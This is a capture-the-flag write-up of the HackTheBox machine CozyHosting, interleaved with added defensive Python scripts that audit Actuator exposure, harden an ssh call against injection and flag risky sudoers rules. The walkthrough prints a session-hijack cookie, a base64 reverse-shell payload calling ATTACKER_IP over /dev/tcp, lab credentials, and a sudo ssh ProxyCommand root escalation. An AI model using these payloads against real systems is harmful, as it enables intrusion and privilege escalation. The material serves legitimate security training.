CozyHosting is an Easy-rated Linux machine on HackTheBox that features a Java-based web application with misconfigured Spring Boot Actuator endpoints. The attack path involves leveraging exposed session data to gain administrative access, exploiting an OS command injection vulnerability to obtain a foothold, and pivoting through credential reuse to ultimately escalate privileges to root.
Difficulty: Easy (Linux)
```
22/tcp open ssh  OpenSSH 8.9p1 Ubuntu 3ubuntu0.3
80/tcp open http nginx 1.18.0 (Ubuntu)
```
Port 80 redirects to http://cozyhosting.htb — a hosting platform landing page served by nginx. SSH is available on port 22.
Visiting /error returns a Spring Boot Whitelabel Error Page, identifying the backend framework:
```
Whitelabel Error Page
This application has no explicit mapping for /error, so you are seeing this as a fallback.
```
Using feroxbuster with a Spring Boot–specific wordlist:
```bash
feroxbuster --url http://cozyhosting.htb \
  --wordlist=/usr/share/seclists/Discovery/Web-Content/Programming-Language-Specific/Java-Spring-Boot.txt
```
Key findings:
| Endpoint | Status | Description |
|---|---|---|
| /actuator | 200 | Spring Boot Actuator index |
| /actuator/env | 200 | Environment properties (values masked) |
| /actuator/sessions | 200 | Active HTTP sessions |
| /actuator/mappings | 200 | Registered request mappings |
| /actuator/beans | 200 | Application bean definitions |
| /actuator/health | 200 | Health check endpoint |
| /login | 200 | Login page |
The exposed Actuator endpoints reveal extensive application internals. The /actuator/env output confirms a PostgreSQL backend (spring.datasource.* properties) and identifies the application jar as cloudhosting-0.0.1.jar.
The /actuator/sessions endpoint exposes active session IDs:
```json
{
  "855364B960FB1C04CF7835B2FFBD3ABA": "UNAUTHORIZED",
  "DCCBC9C135A4D806D606B8864DB32A1B": "kanderson"
}
```
User kanderson has an active authenticated session. Setting the JSESSIONID cookie in the browser grants access to the admin dashboard at /admin:
```javascript
document.cookie = "JSESSIONID=DCCBC9C135A4D806D606B8864DB32A1B"
```
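From the defending side, the two things to check at this stage are whether Actuator endpoints are reachable at all and whether a session id is being replayed from a second client address. The script below is an added example and is not part of the original write-up or of the CozyHosting application: it parses constructed nginx access-log lines (assuming a `log_format` that appends `$cookie_JSESSIONID` as a final quoted field), reports Actuator requests the server actually served, lists any JSESSIONID seen from more than one address, and audits `management.endpoints.web.exposure.include` in a constructed `application.properties`, showing the over-exposed setting next to a hardened one.

```python
"""
Added example (not from the original write-up): detect Spring Boot Actuator
exposure in a nginx access log, spot a JSESSIONID used from several client
addresses, and audit application.properties for over-exposed management
endpoints. Every log line and property value below is constructed sample data.
"""
import re
from collections import defaultdict

# Assumed nginx log_format: the default "combined" format with the request's
# JSESSIONID cookie appended as a final quoted field ("$cookie_JSESSIONID";
# nginx logs an empty variable as "-").
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)" "(?P<sid>[^"]*)"$'
)

# Constructed sample: one client enumerating Actuator, then reusing a session
# id that a different address had already been using for /admin.
SAMPLE_ACCESS_LOG = """\
10.10.14.5 - - [01/Jan/2024:10:00:01 +0000] "GET /actuator HTTP/1.1" 200 512 "-" "feroxbuster/2.10.0" "-"
10.10.14.5 - - [01/Jan/2024:10:00:02 +0000] "GET /actuator/sessions HTTP/1.1" 200 128 "-" "feroxbuster/2.10.0" "-"
10.10.14.5 - - [01/Jan/2024:10:00:03 +0000] "GET /actuator/env HTTP/1.1" 200 4096 "-" "feroxbuster/2.10.0" "-"
10.10.14.5 - - [01/Jan/2024:10:00:04 +0000] "GET /actuator/heapdump HTTP/1.1" 404 0 "-" "feroxbuster/2.10.0" "-"
192.168.1.20 - - [01/Jan/2024:09:55:00 +0000] "GET /admin HTTP/1.1" 200 2048 "-" "Mozilla/5.0" "DCCBC9C135A4D806D606B8864DB32A1B"
10.10.14.5 - - [01/Jan/2024:10:00:10 +0000] "GET /admin HTTP/1.1" 200 2048 "-" "Mozilla/5.0" "DCCBC9C135A4D806D606B8864DB32A1B"
192.168.1.21 - - [01/Jan/2024:09:56:00 +0000] "GET /login HTTP/1.1" 200 1024 "-" "Mozilla/5.0" "-"
"""


def parse_access_log(text):
    """Parse log lines into dicts; lines that do not match the format are skipped."""
    records = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            records.append(m.groupdict())
    return records


def actuator_hits(records):
    """Actuator requests the server actually answered (2xx), keyed by client address."""
    hits = defaultdict(list)
    for r in records:
        if r["path"].startswith("/actuator") and r["status"].startswith("2"):
            hits[r["ip"]].append(r["path"])
    return dict(hits)


def shared_sessions(records):
    """Session ids observed from more than one client address (possible hijack)."""
    seen = defaultdict(set)
    for r in records:
        if r["sid"] != "-":
            seen[r["sid"]].add(r["ip"])
    return {sid: sorted(ips) for sid, ips in seen.items() if len(ips) > 1}


# --- configuration audit ---------------------------------------------------
# Actuator endpoints whose output is sensitive when reachable without auth.
SENSITIVE_ENDPOINTS = {"env", "sessions", "mappings", "beans", "heapdump",
                       "threaddump", "loggers", "configprops"}

# Constructed: the over-exposed setting beside a hardened one. Spring Boot
# exposes only "health" over HTTP by default; "*" exposes every endpoint.
WEAK_PROPERTIES = "management.endpoints.web.exposure.include=*\n"
HARDENED_PROPERTIES = (
    "management.endpoints.web.exposure.include=health\n"
    "management.endpoint.health.show-details=never\n"
)


def audit_actuator_exposure(properties_text):
    """Return findings for the management exposure setting in a properties file."""
    findings = []
    for raw in properties_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        key, _, value = line.partition("=")
        if key.strip() == "management.endpoints.web.exposure.include":
            exposed = {v.strip() for v in value.split(",")}
            if "*" in exposed:
                findings.append("all actuator endpoints exposed (include=*)")
            for name in sorted(exposed & SENSITIVE_ENDPOINTS):
                findings.append(f"sensitive actuator endpoint exposed: {name}")
    return findings


if __name__ == "__main__":
    recs = parse_access_log(SAMPLE_ACCESS_LOG)
    print("actuator hits:", actuator_hits(recs))
    print("shared sessions:", shared_sessions(recs))
    print("weak config:", audit_actuator_exposure(WEAK_PROPERTIES))
    print("hardened config:", audit_actuator_exposure(HARDENED_PROPERTIES))
```

The 404 on /actuator/heapdump is deliberately left out of the findings: a scanner probing endpoints that are not exposed is noise, while a 200 on /actuator/sessions or /actuator/env is the misconfiguration itself. Restricting `include` to `health` removes the sessions leak entirely; if other endpoints are genuinely needed they should sit behind authentication rather than in the public `include` list.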
The admin dashboard contains a "Connection settings" form with Hostname and Username fields. This form triggers an SSH command on the backend.
Testing backtick injection in the Username field confirms command execution:
```
Hostname: 127.0.0.1
Username: `id`
```
Response:
```
ssh: Could not resolve hostname uid=1001(app): Name or service not known
```
The output of id is embedded in the SSH error — confirming OS command injection.
Spaces are rejected in the Username field. Bypass using ${IFS} as a space substitute and base64 encoding for the payload:
```bash
# Encode reverse shell
echo -n "bash -i >& /dev/tcp/ATTACKER_IP/1338 0>&1" | base64
# => YmFzaCAtaSA+JiAvZGV2L3RjcC9BVFRBQ0tFUl9JUC8xMzM4IDA+JjE=

# Listener
nc -lvnp 1338
```
Username payload:
```
`echo${IFS}YmFzaCAtaSA+JiAvZGV2L3RjcC9BVFRBQ0tFUl9JUC8xMzM4IDA+JjE=|base64${IFS}-d|bash`
```
Shell received as app (uid=1001).
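The injection works because the backend builds a shell command string from the two form fields, so the shell evaluates the backticks before ssh ever runs. The following is an added example, a Python sketch rather than the application's Java code: the vulnerable string-building pattern is shown next to a hardened version that validates both fields against strict patterns and passes them to ssh as separate argv entries with no shell. The hostname check also rejects a leading hyphen so a field value can never be parsed as an ssh option. The function names, regular expressions and ssh options chosen here are my own.

```python
"""
Added example (not from the original write-up): the string-built shell
command that makes the "Connection settings" form injectable, beside a
hardened version that validates both fields and never involves a shell.
The real application is Java; this Python sketch models the same pattern.
"""
import re
import subprocess

# RFC 1123 hostname: labels of letters, digits and hyphens, no label starting
# or ending with a hyphen, so a value such as "-oProxyCommand=..." cannot be
# handed to ssh in a position where it would be read as an option.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)
# Conservative POSIX-style account name: no spaces, quotes, backticks, $ or ;.
USERNAME_RE = re.compile(r"^[a-z_][a-z0-9_-]{0,31}$")


def vulnerable_build_command(host, user):
    """The injectable pattern: user input concatenated into one shell string.
    Returned here, never executed; anything the shell interprets (backticks,
    $(...), ${IFS}) is evaluated before ssh sees it."""
    return f"ssh {user}@{host}"


def check_connection_input(host, user):
    """Return a list of validation problems; an empty list means both fields are clean."""
    problems = []
    if not HOSTNAME_RE.match(host):
        problems.append("hostname is not a valid RFC 1123 name")
    if not USERNAME_RE.match(user):
        problems.append("username contains characters outside [a-z0-9_-]")
    return problems


def build_ssh_argv(host, user):
    """Hardened form: validated fields passed as separate argv entries.
    '-l user' keeps the username out of the host position, and the hostname
    pattern keeps the host from being parsed as an option."""
    problems = check_connection_input(host, user)
    if problems:
        raise ValueError("; ".join(problems))
    return ["ssh", "-o", "BatchMode=yes", "-o", "ConnectTimeout=5", "-l", user, host]


def run_connection_check(host, user):
    """Execute the validated command without a shell; returns ssh's exit status."""
    argv = build_ssh_argv(host, user)
    result = subprocess.run(argv, shell=False, capture_output=True, text=True, timeout=15)
    return result.returncode


if __name__ == "__main__":
    print(vulnerable_build_command("127.0.0.1", "`id`"))   # taint passes straight through
    print(check_connection_input("127.0.0.1", "`id`"))     # hardened form rejects it
    print(build_ssh_argv("127.0.0.1", "kanderson"))
```

Validation alone is not the fix; the argv list with `shell=False` is. The allow-list patterns are there so that a value which survives validation is also safe as an ssh argument, which is why both the backtick username from the write-up and an option-shaped hostname are rejected.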
The application jar is located at /app/cloudhosting-0.0.1.jar. Extracting application.properties reveals PostgreSQL credentials:
```bash
unzip -p cloudhosting-0.0.1.jar BOOT-INF/classes/application.properties
```
```properties
spring.datasource.url=jdbc:postgresql://localhost:5432/cozyhosting
spring.datasource.username=postgres
spring.datasource.password=Vg&nvzAQ7XxR
```
```bash
psql -h 127.0.0.1 -U postgres -d cozyhosting -W
```
Dumping the users table:
```sql
SELECT * FROM users;
```
```
   name    |                           password                           | role
-----------+--------------------------------------------------------------+-------
 kanderson | $2a$10$E/Vcd9ecflmPudWeLSEIv.cvK6QjxjWlWXpij1NVNV3Mm6eH58zim | User
 admin     | $2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm | Admin
```
The admin password is a bcrypt hash. Cracking with hashcat:
```bash
echo '$2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm' > hash.txt
hashcat -m 3200 hash.txt /usr/share/wordlists/rockyou.txt
```
Result: manchesterunited
Checking /etc/passwd reveals a system user josh (uid=1003). The cracked admin password is reused for SSH:
```bash
ssh josh@cozyhosting.htb
# Password: manchesterunited
```
```
josh@cozyhosting:~$ sudo -l
User josh may run the following commands on cozyhosting:
    (root) /usr/bin/ssh *
```
Josh can run ssh as root. The ProxyCommand option allows arbitrary command execution:
```bash
sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x
```
Root shell obtained.
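The rule is dangerous not because of the wildcard alone but because ssh can start another program through ProxyCommand, so any sudo rule that delegates such a binary with unconstrained arguments amounts to a root shell. The script below is an added example, not from the write-up: a minimal sudoers parser run over a constructed file that flags exactly that combination. The `COMMAND_CAPABLE` list is an assumed, illustrative set, not an exhaustive one.

```python
"""
Added example (not from the original write-up): a small sudoers audit that
flags rules like "(root) /usr/bin/ssh *", where the delegated binary can
itself launch other programs and its argument list is unconstrained.
The sudoers text below is constructed sample data, not the box's real file.
"""
import posixpath
import re

# Binaries that can spawn an arbitrary program from their own options or
# configuration (ssh via ProxyCommand, editors and pagers via shell escapes,
# find via -exec, and so on). Assumed, illustrative list, not exhaustive.
COMMAND_CAPABLE = {"ssh", "scp", "sftp", "rsync", "vim", "vi", "less", "more",
                   "find", "awk", "perl", "python3", "tar", "git", "env"}

# user  host_list = (runas) [TAG: ...] command_list
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<hosts>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$"
)

SAMPLE_SUDOERS = """\
# constructed sample, not the box's real file
Defaults env_reset
root    ALL=(ALL:ALL) ALL
josh    ALL=(root) /usr/bin/ssh *
backup  ALL=(root) NOPASSWD: /usr/bin/rsync -a /srv/data/ /mnt/backup/
deploy  ALL=(root) /usr/bin/systemctl restart cozyhosting
"""


def parse_sudoers(text):
    """Return (user, runas, command) for each user specification line."""
    rules = []
    for raw in text.splitlines():
        line = raw.strip()
        if (not line or line.startswith("#") or line.startswith("Defaults")
                or re.match(r"^(User|Runas|Host|Cmnd)_Alias\b", line)):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        runas = m.group("runas") or "root"   # sudoers defaults the run-as user to root
        for cmd in m.group("cmds").split(","):
            rules.append((m.group("user"), runas, cmd.strip()))
    return rules


def audit_sudoers(text):
    """Return (user, command, reason) for rules that amount to arbitrary execution."""
    findings = []
    for user, runas, cmd in parse_sudoers(text):
        if cmd == "ALL":
            findings.append((user, cmd, "any command"))
            continue
        parts = cmd.split()
        binary = posixpath.basename(parts[0])
        args = parts[1:]
        # In sudoers a command listed with no arguments permits ANY arguments,
        # so "/usr/bin/ssh" and "/usr/bin/ssh *" are equally permissive.
        unconstrained = not args or any("*" in a or "?" in a for a in args)
        if binary in COMMAND_CAPABLE and unconstrained:
            findings.append((user, cmd,
                             f"{binary} can launch other programs and its arguments are unconstrained"))
    return findings


if __name__ == "__main__":
    for user, cmd, reason in audit_sudoers(SAMPLE_SUDOERS):
        print(f"{user}: {cmd!r}: {reason}")
```

The `backup` and `deploy` rules pass because their argument lists are fixed: sudo matches the full command line literally, so `-e` (rsync) or `-o ProxyCommand` cannot be appended. The `josh` rule is flagged for the same reason the write-up's escalation works, and the right fix is to stop delegating ssh to root at all rather than to tighten the wildcard.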
| Flag | Hash |
|---|---|
| User | 94e1fd872f6d72e66475c39de165xxxx |
| Root | 74359c82428b875194d675317d27xxxx |
Nmap → nginx on port 80 → Spring Boot (Whitelabel error page)
→ Feroxbuster with Spring Boot wordlist → Actuator endpoints exposed
→ /actuator/sessions → session hijack as kanderson → admin dashboard
→ Command injection in SSH Username field (backtick injection)
→ Reverse shell as app (uid=1001)
→ DB creds from application.properties → PostgreSQL enumeration
→ Bcrypt hash cracked (manchesterunited) → SSH as josh
→ sudo ssh ProxyCommand → root